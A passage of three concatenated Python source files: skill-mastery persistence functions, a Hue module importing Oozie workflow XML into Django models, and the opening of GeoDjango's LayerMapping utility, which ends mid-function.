'misconception_count': skill_summary.misconception_count,
'worked_examples_count': skill_summary.worked_examples_count,
'skill_model_last_updated': skill_summary.skill_model_last_updated,
'skill_model_created_on': skill_summary.skill_model_created_on
}
if skill_summary_model is not None:
skill_summary_model.populate(**skill_summary_dict)
else:
skill_summary_dict['id'] = skill_summary.id
skill_summary_model = skill_models.SkillSummaryModel(
**skill_summary_dict)
return skill_summary_model
def save_skill_summary(skill_summary):
"""Save a skill summary domain object as a SkillSummaryModel
entity in the datastore.
Args:
skill_summary: SkillSummaryModel. The skill summary object to be saved
in the datastore.
"""
existing_skill_summary_model = (
skill_models.SkillSummaryModel.get_by_id(skill_summary.id))
skill_summary_model = populate_skill_summary_model_fields(
existing_skill_summary_model, skill_summary
)
skill_summary_model.update_timestamps()
skill_summary_model.put()
def create_user_skill_mastery(user_id, skill_id, degree_of_mastery):
"""Creates skill mastery of a user.
Args:
user_id: str. The user ID of the user for whom to create the model.
skill_id: str. The unique id of the skill.
degree_of_mastery: float. The degree of mastery of user in the skill.
"""
user_skill_mastery = skill_domain.UserSkillMastery(
user_id, skill_id, degree_of_mastery)
save_user_skill_mastery(user_skill_mastery)
def save_user_skill_mastery(user_skill_mastery):
"""Stores skill mastery of a user.
Args:
user_skill_mastery: dict. The user skill mastery model of a user.
"""
user_skill_mastery_model = user_models.UserSkillMasteryModel(
id=user_models.UserSkillMasteryModel.construct_model_id(
user_skill_mastery.user_id, user_skill_mastery.skill_id),
user_id=user_skill_mastery.user_id,
skill_id=user_skill_mastery.skill_id,
degree_of_mastery=user_skill_mastery.degree_of_mastery)
user_skill_mastery_model.update_timestamps()
user_skill_mastery_model.put()
def create_multi_user_skill_mastery(user_id, degrees_of_mastery):
"""Creates the mastery of a user in multiple skills.
Args:
user_id: str. The user ID of the user.
degrees_of_mastery: dict(str, float). The keys are the requested
skill IDs. The values are the corresponding mastery degree of
the user.
"""
user_skill_mastery_models = []
for skill_id, degree_of_mastery in degrees_of_mastery.items():
user_skill_mastery_models.append(user_models.UserSkillMasteryModel(
id=user_models.UserSkillMasteryModel.construct_model_id(
user_id, skill_id),
user_id=user_id, skill_id=skill_id,
degree_of_mastery=degree_of_mastery))
user_models.UserSkillMasteryModel.update_timestamps_multi(
user_skill_mastery_models)
user_models.UserSkillMasteryModel.put_multi(user_skill_mastery_models)
def get_user_skill_mastery(user_id, skill_id):
"""Fetches the mastery of user in a particular skill.
Args:
user_id: str. The user ID of the user.
skill_id: str. Unique id of the skill for which mastery degree is
requested.
Returns:
float or None. Mastery degree of the user for the requested skill, or
None if UserSkillMasteryModel does not exist for the skill.
"""
model_id = user_models.UserSkillMasteryModel.construct_model_id(
user_id, skill_id)
user_skill_mastery_model = user_models.UserSkillMasteryModel.get(
model_id, strict=False)
if not user_skill_mastery_model:
return None
return user_skill_mastery_model.degree_of_mastery
def get_multi_user_skill_mastery(user_id, skill_ids):
"""Fetches the mastery of user in multiple skills.
Args:
user_id: str. The user ID of the user.
skill_ids: list(str). Skill IDs of the skill for which mastery degree is
requested.
Returns:
dict(str, float|None). The keys are the requested skill IDs. The values
are the corresponding mastery degree of the user or None if
UserSkillMasteryModel does not exist for the skill.
"""
degrees_of_mastery = {}
model_ids = []
for skill_id in skill_ids:
model_ids.append(user_models.UserSkillMasteryModel.construct_model_id(
user_id, skill_id))
skill_mastery_models = user_models.UserSkillMasteryModel.get_multi(
model_ids)
for skill_id, skill_mastery_model in zip(skill_ids, skill_mastery_models):
if skill_mastery_model is None:
degrees_of_mastery[skill_id] = None
else:
degrees_of_mastery[skill_id] = skill_mastery_model.degree_of_mastery
return degrees_of_mastery
def skill_has_associated_questions(skill_id):
"""Returns whether or not any question has this skill attached.
Args:
skill_id: str. The skill ID of the user.
Returns:
bool. Whether any question has this skill attached.
"""
question_ids = (
question_models.QuestionSkillLinkModel.get_all_question_ids_linked_to_skill_id( # pylint: disable=line-too-long
skill_id))
return len(question_ids) > 0
def get_sorted_skill_ids(degrees_of_mastery):
"""Sort the dict based on the mastery value.
Args:
degrees_of_mastery: dict(str, float|None). Dict mapping
skill ids to mastery level. The mastery level can be
float or None.
Returns:
list. List of the initial skill id's based on the mastery level.
"""
skill_dict_with_float_value = {
skill_id: degree for skill_id, degree in degrees_of_mastery.items()
if degree is not None}
sorted_skill_ids_with_float_value = sorted(
skill_dict_with_float_value, key=skill_dict_with_float_value.get)
skill_ids_with_none_value = [
skill_id for skill_id, degree in degrees_of_mastery.items()
if degree is None]
sorted_skill_ids = (
skill_ids_with_none_value + sorted_skill_ids_with_float_value)
return sorted_skill_ids[:feconf.MAX_NUMBER_OF_SKILL_IDS]
def filter_skills_by_mastery(user_id, skill_ids):
"""Given a list of skill_ids, it returns a list of
feconf.MAX_NUMBER_OF_SKILL_IDS skill_ids in which the user has
the least mastery.(Please note that python 2.7 considers the None
type smaller than any value, so None types will be returned first)
Args:
user_id: str. The unique user ID of the user.
skill_ids: list(str). The skill_ids that are to be filtered.
Returns:
list(str). A list of the filtered skill_ids.
"""
degrees_of_mastery = get_multi_user_skill_mastery(user_id, skill_ids)
filtered_skill_ids = get_sorted_skill_ids(degrees_of_mastery)
# Arranges the skill_ids in the order as it was received.
arranged_filtered_skill_ids = []
for skill_id in skill_ids:
if skill_id in filtered_skill_ids:
arranged_filtered_skill_ids.append(skill_id)
return arranged_filtered_skill_ids
|
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Import an external workflow by providing an XML definition.
The workflow definition is imported via the method 'import_workflow'.
The XML is first transformed into a django serialized string that can be deserialized and interpreted.
The interpreted objects are then assigned the worklow, stripped of any useless IDs and saved.
Then the links are interpreted from the original XML definition.
First the basic links are interpreted for basic hierarchy traversal.
Then the related links are infered, including Decision node ends.
See oozie.models.Decision for more information on decision ends.
The XSLTs are partitioned by version.
For every new workflow DTD version a new directory should be created.
IE: uri:oozie:workflow:0.4 => 0.4 directory in xslt dir.
Action extensions are also versioned.
Every action extension will have its own version via /xslt/<workflow version>/extensions/<name of extensions>.<version>.xslt
"""
try:
import json
except ImportError:
import simplejson as json
import logging
from lxml import etree
from django.core import serializers
from django.utils.encoding import smart_str
from django.utils.translation import ugettext as _
from conf import DEFINITION_XSLT_DIR
from models import Workflow, Node, Link, Start, End,\
Decision, DecisionEnd, Fork, Join,\
Kill
from utils import xml_tag
LOG = logging.getLogger(__name__)
OOZIE_NAMESPACES = ['uri:oozie:workflow:0.1', 'uri:oozie:workflow:0.2', 'uri:oozie:workflow:0.3', 'uri:oozie:workflow:0.4']
LINKS = ('ok', 'error', 'path')
def _save_links(workflow, root):
"""
Iterates over all links in the passed XML doc and creates links.
First non-META links are resolved and created, then META links.
Link name is chosen with the following logic:
If node is start, then use 'to'.
Else If node is Join, then use 'to'.
Else If node is Decision, then
If tag is 'default', then use 'default'
Else use 'start'
Else
If tag is 'path', use 'start'
Else use tag as name ('ok' or 'error')
This strategy has the following resolution:
- Fork and Decision nodes have Links named 'start'.
- Decision nodes have a 'default' link.
- Decision nodes may have a 'related' link that is there end.
- Fork nodes always have a 'related' node that is there end join node.
- Start and Join nodes have links named 'to'.
- All action nodes have 'ok' and 'error' links.
Note: The nodes that these links point to should exist already.
Note: Nodes are looked up by workflow and name.
Note: Skip global configuration explicitly. Unknown knows should throw an error.
"""
LOG.debug("Start resolving links for workflow %s" % smart_str(workflow.name))
# Iterate over nodes
for child_el in root:
# Skip special nodes (like comments).
if not isinstance(child_el.tag, basestring):
continue
# Skip kill nodes.
if child_el.tag.endswith('kill'):
continue
# Skip global configuration.
if child_el.tag.endswith('global'):
continue
tag = xml_tag(child_el)
name = child_el.attrib.get('name', tag)
LOG.debug("Getting node with data - XML TAG: %(tag)s\tLINK NAME: %(node_name)s\tWORKFLOW NAME: %(workflow_name)s" % {
'tag': smart_str(tag),
'node_name': smart_str(name),
'workflow_name': smart_str(workflow.name)
})
# Iterate over node members
# Join nodes have attributes which point to the next node
# Start node has attribute which points to first node
try:
parent = Node.objects.get(name=name, workflow=workflow).get_full_node()
except Node.DoesNotExist, e:
raise RuntimeError(_('Node with name %s for workflow %s does not exist.') % (name, workflow.name))
if isinstance(parent, Start):
_start_relationships(workflow, parent, child_el)
elif isinstance(parent, Join):
_join_relationships(workflow, parent, child_el)
elif isinstance(parent, Decision):
_decision_relationships(workflow, parent, child_el)
else:
_node_relationships(workflow, parent, child_el)
workflow.end = End.objects.get(workflow=workflow).get_full_node()
workflow.save()
_resolve_start_relationships(workflow)
_resolve_fork_relationships(workflow)
_resolve_decision_relationships(workflow)
LOG.debug("Finished resolving links for workflow %s" % smart_str(workflow.name))
def _start_relationships(workflow, parent, child_el):
"""
Resolve start node links.
Will always use 'to' link type.
"""
if 'to' not in child_el.attrib:
raise RuntimeError(_("Node %s has a link that is missing 'to' attribute.") % parent.name)
workflow.start = parent
to = child_el.attrib['to']
try:
child = Node.objects.get(workflow=workflow, name=to)
except Node.DoesNotExist, e:
raise RuntimeError(_("Node %s has not been defined.") % to)
obj = Link.objects.create(name='to', parent=parent, child=child)
obj.save()
def _join_relationships(workflow, parent, child_el):
"""
Resolves join node links.
Will always use 'to' link type.
"""
if 'to' not in child_el.attrib:
raise RuntimeError(_("Node %s has a link that is missing 'to' attribute.") % parent.name)
to = child_el.attrib['to']
try:
child = Node.objects.get(workflow=workflow, name=to)
except Node.DoesNotExist, e:
raise RuntimeError(_("Node %s has not been defined.") % to)
obj = Link.objects.create(name='to', parent=parent, child=child)
obj.save()
def _decision_relationships(workflow, parent, child_el):
"""
Resolves the switch statement like nature of decision nodes.
Will use 'to' link type, except for default case.
"""
for switch in child_el:
# Skip special nodes (like comments).
if not isinstance(switch.tag, basestring):
continue
for case in switch:
# Skip special nodes (like comments).
if not isinstance(case.tag, basestring):
continue
if 'to' not in case.attrib:
raise RuntimeError(_("Node %s has a link that is missing 'to' attribute.") % parent.name)
to = case.attrib['to']
try:
child = Node.objects.get(workflow=workflow, name=to)
except Node.DoesNotExist, e:
raise RuntimeError(_("Node %s has not been defined.") % to)
if xml_tag(case) == 'default':
name = 'default'
obj = Link.objects.create(name=name, parent=parent, child=child)
else:
name = 'start'
comment = case.text.strip()
obj = Link.objects.create(name=name, parent=parent, child=child, comment=comment)
obj.save()
def _node_relationships(workflow, parent, child_el):
"""
Resolves node links.
Will use 'start' link type for fork nodes and 'to' link type for all other nodes.
Error links will automatically resolve to a single kill node.
"""
for el in child_el:
# Skip special nodes (like comments).
if not isinstance(el.tag, basestring):
continue
# Links
name = xml_tag(el)
if name in LINKS:
if name == 'path':
if 'start' not in el.attrib:
raise RuntimeError(_("Node %s has a link that is missing 'start' attribute.") % parent.name)
to = el.attrib['start']
name = 'start'
elif name == 'error':
to = 'kill'
else:
if 'to' not in el.attrib:
raise RuntimeError(_("Node %s has a link that is missing 'to' attribute.") % parent.name)
to = el.attrib['to']
try:
child = Node.objects.get(workflow=workflow, name=to)
except Node.DoesNotExist, e:
raise RuntimeError("Node %s has not been defined" % to)
obj = Link.objects.create(name=name, parent=parent, child=child)
obj.save()
def _resolve_start_relationships(workflow):
if not workflow.start:
raise RuntimeError(_("Workflow start has not been created."))
if not workflow.end:
raise RuntimeError(_("Workflow end has not been created."))
obj = Link.objects.get_or_create(name='related', parent=workflow.start, child=workflow.end)
def _resolve_fork_relationships(workflow):
"""
Requires proper workflow structure.
Fork must come before a join.
"""
def helper(workflow, node, last_fork):
if isinstance(node, Fork):
join = None
children = node.get_children()
for child in children:
join = helper(workflow, child.get_full_node(), node) or join
link = Link(name='related', parent=node, child=join)
link.save()
node = join
elif isinstance(node, Join):
return node
join = None
children = node.get_children()
for child in children:
join = helper(workflow, child.get_full_node(), last_fork) or join
return join
helper(workflow, workflow.start.get_full_node(), None)
def _resolve_decision_relationships(workflow):
"""
Requires proper workflow structure.
Decision must come before a any random ends.
DecisionEnd nodes are added to the end of the decision DAG.
Decision DAG ends are inferred by counting the parents of nodes that are node joins.
A 'related' link is created to associate the DecisionEnd to the Decision.
IE: D
D N
N N
N
equals
D
D N
N N
E
E
N
Performs a depth first search to understand branching.
"""
def insert_end(node, decision):
"""Insert DecisionEnd between node and node parents"""
parent_links = node.get_parent_links().exclude(name='default')
decision_end = decision.get_child_end()
# Find parent decision node for every end's parent.
# If the decision node is the one passed,
# change the parent to link to the Decision node's DecisionEnd node.
# Skip embedded decisions and forks along the way.
decision_end_used = False
for parent_link in parent_links:
parent = parent_link.parent.get_full_node()
node_temp = parent
while node_temp and not isinstance(node_temp, Decision):
if isinstance(node_temp, Join):
node_temp = node_temp.get_parent_fork().get_parent()
elif isinstance(node_temp, DecisionEnd):
node_temp = node_temp.get_parent_decision().get_parent()
else:
node_temp = node_temp.get_parent()
if node_temp.id == decision.id and parent.node_type != Decision.node_type:
links = Link.objects.filter(parent=parent).exclude(name__in=['related', 'kill', 'error'])
if len(links) != 1:
raise RuntimeError(_('Cannot import workflows that have decision DAG leaf nodes with multiple children or no children.'))
link = links[0]
link.child = decision_end
link.save()
decision_end_used = True
# Create link between DecisionEnd and terminal node.
if decision_end_used and not Link.objects.filter(name='to', parent=decision_end, child=node).exists():
link = Link(name='to', parent=decision_end, child=node)
link.save()
def decision_helper(decision):
"""
Iterates through children, waits for ends.
When an end is found, finish the decision.
If the end has more parents than the decision has branches, bubble the end upwards.
"""
# Create decision end if it does not exist.
if not Link.objects.filter(parent=decision, name='related').exists():
end = DecisionEnd(workflow=workflow, node_type=DecisionEnd.node_type)
end.save()
link = Link(name='related', parent=decision, child=end)
link.save()
children = [link.child.get_full_node() for link in decision.get_children_links().exclude(name__in=['error','default'])]
ends = set()
for child in children:
end = helper(child)
if end:
ends.add(end)
# A single end means that we've found a unique end for this decision.
# Multiple ends mean that we've found a bad decision.
if len(ends) > 1:
raise RuntimeError(_('Cannot import workflows that have decisions paths with multiple terminal nodes that converge on a single terminal node.'))
elif len(ends) == 1:
end = ends.pop()
# Branch count will vary with each call if we have multiple decision nodes embedded within decision paths.
# This is because parents are replaced with DecisionEnd nodes.
fan_in_count = len(end.get_parent_links().exclude(name__in=['error','default']))
# IF it covers all branches, then it is an end that perfectly matches this decision.
# ELSE it is an end for a decision path that the current decision node is a part of as well.
# The unhandled case is multiple ends for a single decision that converge on a single end.
# This is not handled in Hue.
fan_out_count = len(decision.get_children_links().exclude(name__in=['error','default']))
if fan_in_count > fan_out_count:
insert_end(end, decision)
return end
elif fan_in_count == fan_out_count:
insert_end(end, decision)
# End node is a decision node.
# This means that there are multiple decision nodes in sequence.
# If both decision nodes are within a single decision path,
# then the end may need to be returned, if found.
if isinstance(end, Decision):
end = decision_helper(end)
if end:
return end
# Can do this because we've replace all its parents with a single DecisionEnd node.
return helper(end)
else:
raise RuntimeError(_('Cannot import workflows that have decisions paths with multiple terminal nodes that converge on a single terminal node.'))
else:
raise RuntimeError(_('Cannot import workflows that have decisions paths that never end.'))
return None
def helper(node):
"""Iterates through nodes, returning ends."""
# Assume receive full node.
children = [link.child.get_full_node() for link in node.get_children_links().exclude(name__in=['error','default'])]
# Will not be a kill node because we skip error links.
# Error links should not go to a regular node.
if node.get_parent_links().filter(name='error').exists():
raise RuntimeError(_('Error links cannot point to an ordinary node.'))
# Multiple parents means that we've found an end.
# Joins will always have more than one parent.
fan_in_count = len(node.get_parent_links().exclude(name__in=['error','default']))
if fan_in_count > 1 and not isinstance(node, Join) and not isinstance(node, DecisionEnd):
return node
elif isinstance(node, Decision):
end = decision_helper(node)
if end:
return end
# I case of fork, should not find different ends.
elif len(children) > 1:
end = None
for child in children:
temp = helper(child)
end = end or temp
if end != temp:
raise RuntimeError(_('Different ends found in fork.'))
return end
elif children:
return helper(children.pop())
# Likely reached end.
return None
helper(workflow.start.get_full_node())
def _prepare_nodes(workflow, root):
"""
Prepare nodes for groking by Django
- Deserialize
- Automatically skip undefined nodes.
"""
objs = serializers.deserialize('xml', etree.tostring(root))
# First pass is a list of nodes and their types respectively.
# Must link up nodes with their respective full nodes.
node = None
nodes = []
for obj in objs:
obj.object.workflow = workflow
if type(obj.object) is Node:
node = obj.object
else:
node.node_type = obj.object.node_type
full_node = obj.object
for k, v in vars(node).items():
if not k.startswith('_') and k not in ('node_type','workflow','node_ptr_id'):
setattr(full_node, k, v)
full_node.workflow = workflow
full_node.node_type = type(full_node).node_type
full_node.node_ptr_id = None
full_node.id = None
nodes.append(full_node)
return nodes
def _preprocess_nodes(workflow, transformed_root, workflow_definition_root, nodes, fs=None):
"""
preprocess nodes
Resolve start name and subworkflow dependencies.
Looks at path and interrogates all workflows until the proper deployment path is found.
If the proper deployment path is never found, then
"""
for full_node in nodes:
if full_node.node_type is 'start':
full_node.name = 'start'
elif full_node.node_type is 'subworkflow':
app_path = None
for action_el in workflow_definition_root:
if 'name' in action_el.attrib and action_el.attrib['name'] == full_node.name:
for subworkflow_el in action_el:
if xml_tag(subworkflow_el) == 'sub-workflow':
for property_el in subworkflow_el:
if xml_tag(property_el) == 'app-path':
app_path = property_el.text
if app_path is None:
raise RuntimeError(_("Could not find app-path for subworkflow %s") % full_node.name)
subworkflow = _resolve_subworkflow_from_deployment_dir(fs, workflow, app_path)
if subworkflow:
full_node.sub_workflow = subworkflow
else:
raise RuntimeError(_("Could not find subworkflow with deployment directory: %s") % app_path)
def _resolve_subworkflow_from_deployment_dir(fs, workflow, app_path):
"""
Resolves subworkflow in a subworkflow node
Looks at path and interrogates all workflows until the proper deployment path is found.
If the proper deployment path is never found, then
"""
if not fs:
raise RuntimeError(_("No hadoop file system to operate on."))
if app_path.endswith('/'):
app_path = app_path[:-1]
if app_path.startswith('hdfs://'):
app_path = app_path[7:]
try:
f = fs.open('%s/workflow.xml' % app_path)
root = etree.parse(f)
f.close()
return Workflow.objects.get(name=root.attrib['name'])
except IOError:
pass
except (KeyError, AttributeError), e:
raise RuntimeError(_("Could not find workflow name when resolving subworkflow."))
except Workflow.DoesNotExist, e:
raise RuntimeError(_("Could not find workflow with name %s extracted from subworkflow path %s") % (root.attrib['name'], app_path))
except Exception, e:
raise RuntimeError(_("Could not find workflow at path %s") % app_path)
for subworkflow in Workflow.objects.available():
if subworkflow.deployment_dir == app_path:
if workflow.owner.id != subworkflow.owner.id:
raise RuntimeError(_("Subworkflow is not owned by %s") % workflow.owner)
return subworkflow
return None
def _save_nodes(workflow, nodes):
"""
Save nodes, but skip kill nodes because we create a single kill node to use.
"""
for node in nodes:
if node.node_type is 'kill':
continue
try:
# Do not overwrite start or end node
Node.objects.get(workflow=workflow, node_type=node.node_type, name=node.name)
except Node.DoesNotExist:
node.save()
# Create kill node
# Only need it if we have a node to reference it with.
if len(nodes) > 2:
Kill.objects.create(name='kill', workflow=workflow, node_type=Kill.node_type)
def import_workflow(workflow, workflow_definition, fs=None):
xslt_definition_fh = open("%(xslt_dir)s/workflow.xslt" % {
'xslt_dir': DEFINITION_XSLT_DIR.get()
})
# Parse Workflow Definition
workflow_definition_root = etree.fromstring(workflow_definition)
if workflow_definition_root is None:
raise RuntimeError(_("Could not find any nodes in Workflow definition. Maybe it's malformed?"))
ns = workflow_definition_root.tag[:-12] # Remove workflow-app from tag in order to get proper namespace prefix
schema_version = ns and ns[1:-1] or None
# Ensure namespace exists
if schema_version not in OOZIE_NAMESPACES:
raise RuntimeError(_("Tag with namespace %(namespace)s is not valid. Please use one of the following namespaces: %(namespaces)s") % {
'namespace': workflow_definition_root.tag,
'namespaces': ', '.join(OOZIE_NAMESPACES)
})
# Get XSLT
xslt = etree.parse(xslt_definition_fh)
xslt_definition_fh.close()
transform = etree.XSLT(xslt)
# Transform XML using XSLT
transformed_root = transform(workflow_definition_root)
# Resolve workflow dependencies and node types and link dependencies
nodes = _prepare_nodes(workflow, transformed_root)
_preprocess_nodes(workflow, transformed_root, workflow_definition_root, nodes, fs)
_save_nodes(workflow, nodes)
_save_links(workflow, workflow_definition_root)
# Update schema_version
workflow.schema_version = schema_version
workflow.save()
|
|
# LayerMapping -- A Django Model/OGR Layer Mapping Utility
"""
The LayerMapping class provides a way to map the contents of OGR
vector files (e.g. SHP files) to Geographic-enabled Django models.
This grew out of my personal needs, specifically the code repetition
that went into pulling geometries and fields out of an OGR layer,
converting to another coordinate system (e.g. WGS84), and then inserting
into a GeoDjango model.
Please report any bugs encountered using this utility.
Requirements: OGR C Library (from GDAL) required.
Usage:
lm = LayerMapping(model, source_file, mapping) where,
model:
GeoDjango model (not an instance)
data:
OGR-supported data source file (e.g. a shapefile) or
gdal.DataSource instance
mapping:
A python dictionary, keys are strings corresponding
to the GeoDjango model field, and values correspond to
string field names for the OGR feature, or if the model field
is a geographic then it should correspond to the OGR
geometry type, e.g. 'POINT', 'LINESTRING', 'POLYGON'.
Keyword Args:
layer:
The index of the layer to use from the Data Source (defaults to 0)
source_srs:
Use this to specify the source SRS manually (for example,
some shapefiles don't come with a '.prj' file). An integer SRID,
a string WKT, and SpatialReference objects are valid parameters.
encoding:
Specifies the encoding of the string in the OGR data source.
For example, 'latin-1', 'utf-8', and 'cp437' are all valid
encoding parameters.
transaction_mode:
May be 'commit_on_success' (default) or 'autocommit'.
transform:
Setting this to False will disable all coordinate transformations.
unique:
Setting this to the name, or a tuple of names, from the given
model will create models unique only to the given name(s).
Geometries will from each feature will be added into the collection
associated with the unique model. Forces transaction mode to
be 'autocommit'.
Example:
1. You need a GDAL-supported data source, like a shapefile.
Assume we're using the test_poly SHP file:
>>> from django.contrib.gis.gdal import DataSource
>>> ds = DataSource('test_poly.shp')
>>> layer = ds[0]
>>> print layer.fields # Exploring the fields in the layer, we only want the 'str' field.
['float', 'int', 'str']
>>> print len(layer) # getting the number of features in the layer (should be 3)
3
>>> print layer.geom_type # Should be 3 (a Polygon)
3
>>> print layer.srs # WGS84
GEOGCS["GCS_WGS_1984",
DATUM["WGS_1984",
SPHEROID["WGS_1984",6378137,298.257223563]],
PRIMEM["Greenwich",0],
UNIT["Degree",0.017453292519943295]]
2. Now we define our corresponding Django model (make sure to use syncdb):
from django.contrib.gis.db import models
class TestGeo(models.Model, models.GeoMixin):
name = models.CharField(maxlength=25) # corresponds to the 'str' field
poly = models.PolygonField(srid=4269) # we want our model in a different SRID
objects = models.GeoManager()
def __str__(self):
return 'Name: %s' % self.name
3. Use LayerMapping to extract all the features and place them in the database:
>>> from django.contrib.gis.utils import LayerMapping
>>> from geoapp.models import TestGeo
>>> mapping = {'name' : 'str', # The 'name' model field maps to the 'str' layer field.
'poly' : 'POLYGON', # For geometry fields use OGC name.
} # The mapping is a dictionary
>>> lm = LayerMapping(TestGeo, 'test_poly.shp', mapping)
>>> lm.save(verbose=True) # Save the layermap, imports the data.
Saved: Name: 1
Saved: Name: 2
Saved: Name: 3
LayerMapping just transformed the three geometries from the SHP file from their
source spatial reference system (WGS84) to the spatial reference system of
the GeoDjango model (NAD83). If no spatial reference system is defined for
the layer, use the `source_srs` keyword with a SpatialReference object to
specify one.
"""
import sys
from datetime import date, datetime
from decimal import Decimal
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.gis.db.models import GeometryField
from django.contrib.gis.db.backend import SpatialBackend
from django.contrib.gis.gdal import CoordTransform, DataSource, \
OGRException, OGRGeometry, OGRGeomType, SpatialReference
from django.contrib.gis.gdal.field import \
OFTDate, OFTDateTime, OFTInteger, OFTReal, OFTString, OFTTime
from django.contrib.gis.models import GeometryColumns, SpatialRefSys
from django.db import models, transaction
# LayerMapping exceptions.
class LayerMapError(Exception): pass
class InvalidString(LayerMapError): pass
class InvalidDecimal(LayerMapError): pass
class InvalidInteger(LayerMapError): pass
class MissingForeignKey(LayerMapError): pass
class LayerMapping(object):
"A class that maps OGR Layers to GeoDjango Models."
# Acceptable 'base' types for a multi-geometry type.
MULTI_TYPES = {1 : OGRGeomType('MultiPoint'),
2 : OGRGeomType('MultiLineString'),
3 : OGRGeomType('MultiPolygon'),
}
# Acceptable Django field types and corresponding acceptable OGR
# counterparts.
FIELD_TYPES = {
models.AutoField : OFTInteger,
models.IntegerField : (OFTInteger, OFTReal, OFTString),
models.FloatField : (OFTInteger, OFTReal),
models.DateField : OFTDate,
models.DateTimeField : OFTDateTime,
models.EmailField : OFTString,
models.TimeField : OFTTime,
models.DecimalField : (OFTInteger, OFTReal),
models.CharField : OFTString,
models.SlugField : OFTString,
models.TextField : OFTString,
models.URLField : OFTString,
models.USStateField : OFTString,
models.XMLField : OFTString,
models.SmallIntegerField : (OFTInteger, OFTReal, OFTString),
models.PositiveSmallIntegerField : (OFTInteger, OFTReal, OFTString),
}
# The acceptable transaction modes.
TRANSACTION_MODES = {'autocommit' : transaction.autocommit,
'commit_on_success' : transaction.commit_on_success,
}
def __init__(self, model, data, mapping, layer=0,
source_srs=None, encoding=None,
transaction_mode='commit_on_success',
transform=True, unique=None):
"""
A LayerMapping object is initialized using the given Model (not an instance),
a DataSource (or string path to an OGR-supported data file), and a mapping
dictionary. See the module level docstring for more details and keyword
argument usage.
"""
# Getting the DataSource and the associated Layer.
if isinstance(data, basestring):
self.ds = DataSource(data)
else:
self.ds = data
self.layer = self.ds[layer]
# Setting the mapping
self.mapping = mapping
# Setting the model, and getting the geometry column associated
# with the model (an exception will be raised if there is no
# geometry column).
self.model = model
self.geo_col = self.geometry_column()
# Checking the source spatial reference system, and getting
# the coordinate transformation object (unless the `transform`
# keyword is set to False)
if transform:
self.source_srs = self.check_srs(source_srs)
self.transform = self.coord_transform()
else:
self.transform = transform
# Checking the layer -- intitialization of the object will fail if
# things don't check out before hand.
self.check_layer()
# Setting the encoding for OFTString fields, if specified.
if encoding:
# Making sure the encoding exists, if not a LookupError
# exception will be thrown.
from codecs import lookup
lookup(encoding)
self.encoding = encoding
else:
self.encoding = None
if unique:
self.check_unique(unique)
transaction_mode = 'autocommit' # Has to be set to autocommit.
self.unique = unique
else:
self.unique = None
# Setting the transaction decorator with the function in the
# transaction modes dictionary.
if transaction_mode in self.TRANSACTION_MODES:
self.transaction_decorator = self.TRANSACTION_MODES[transaction_mode]
self.transaction_mode = transaction_mode
else:
raise LayerMapError('Unrecognized transaction mode: %s' % transaction_mode)
#### Checking routines used during initialization ####
def check_fid_range(self, fid_range):
"This checks the `fid_range` keyword."
if fid_range:
if isinstance(fid_range, (tuple, list)):
return slice(*fid_range)
elif isinstance(fid_range, slice):
return fid_range
else:
raise TypeError
else:
return None
def check_layer(self):
"""
This checks the Layer metadata, and ensures that it is compatible
with the mapping information and model. Unlike previous revisions,
there is no need to increment through each feature in the Layer.
"""
# The geometry field of the model is set here.
# TODO: Support more than one geometry field / model.
self.geom_field = False
self.fields = {}
# Getting lists of the field names and the field types available in
# the OGR Layer.
ogr_fields = self.layer.fields
ogr_field_types = self.layer.field_types
# Function for determining if the OGR mapping field is in the Layer.
def check_ogr_fld(ogr_map_fld):
try:
idx = ogr_fields.index(ogr_map_fld)
except ValueError:
raise LayerMapError('Given mapping OGR field "%s" not found in OGR Layer.' % ogr_map_fld)
return idx
# No need to increment through each feature in the model, simply check
# the Layer metadata against what was given in the mapping dictionary.
for field_name, ogr_name in self.mapping.items():
# Ensuring that a corresponding field exists in the model
# for the given field name in the mapping.
try:
model_field = self.model._meta.get_field(field_name)
except models.fields.FieldDoesNotExist:
raise LayerMapError('Given mapping field "%s" not in given Model fields.' % field_name)
# Getting the string name for the Django field class (e.g., 'PointField').
fld_name = model_field.__class__.__name__
if isinstance(model_field, GeometryField):
if self.geom_field:
raise LayerMapError('LayerMapping does not support more than one GeometryField per model.')
try:
gtype = OGRGeomType(ogr_name)
except OGRException:
raise LayerMapError('Invalid mapping for GeometryField "%s".' % field_name)
# Making sure that the OGR Layer's Geometry is compatible.
ltype = self.layer.geom_type
if not (gtype == ltype or self.make_multi(ltype, model_field)):
raise LayerMapError('Invalid mapping geometry; model has %s, feature has %s.' % (fld_name, gtype))
# Setting the `geom_field` attribute w/the name of the model field
# that is a Geometry.
self.geom_field = field_name
fields_val = model_field
elif isinstance(model_field, models.ForeignKey):
if isinstance(ogr_name, dict):
# Is every given related model mapping field in the Layer?
rel_model = model_field.rel.to
for rel_name, ogr_field in ogr_name.items():
idx = check_ogr_fld(ogr_field)
try:
rel_field = rel_model._meta.get_field(rel_name)
except models.fields.FieldDoesNotExist:
raise LayerMapError('ForeignKey mapping field "%s" not in %s fields.' %
(rel_name, rel_model.__class__.__name__))
fields_val = rel_model
else:
raise TypeError('ForeignKey mapping must be of dictionary type.')
else:
# Is the model field type supported by LayerMapping?
if not model_field.__class__ in self.FIELD_TYPES:
raise LayerMapError('Django field type "%s" has no OGR mapping (yet).' % fld_name)
# Is the OGR field in the Layer?
idx = check_ogr_fld(ogr_name)
ogr_field = ogr_field_types[idx]
# Can the OGR field type be mapped to the Django field type?
if not issubclass(ogr_field, self.FIELD_TYPES[model_field.__class__]):
raise LayerMapError('OGR field "%s" (of type %s) cannot be mapped to Django %s.' %
(ogr_field, ogr_field.__name__, fld_name))
fields_val = model_field
self.fields[field_name] = fields_val
def check_srs(self, source_srs):
"Checks the compatibility of the given spatial reference object."
if isinstance(source_srs, SpatialReference):
sr = source_srs
elif isinstance(source_srs, SpatialRefSys):
sr = source_srs.srs
elif isinstance(source_srs, (int, basestring)):
sr = SpatialReference(source_srs)
else:
# Otherwise just pulling the SpatialReference from the layer
sr = self.layer.srs
if not sr:
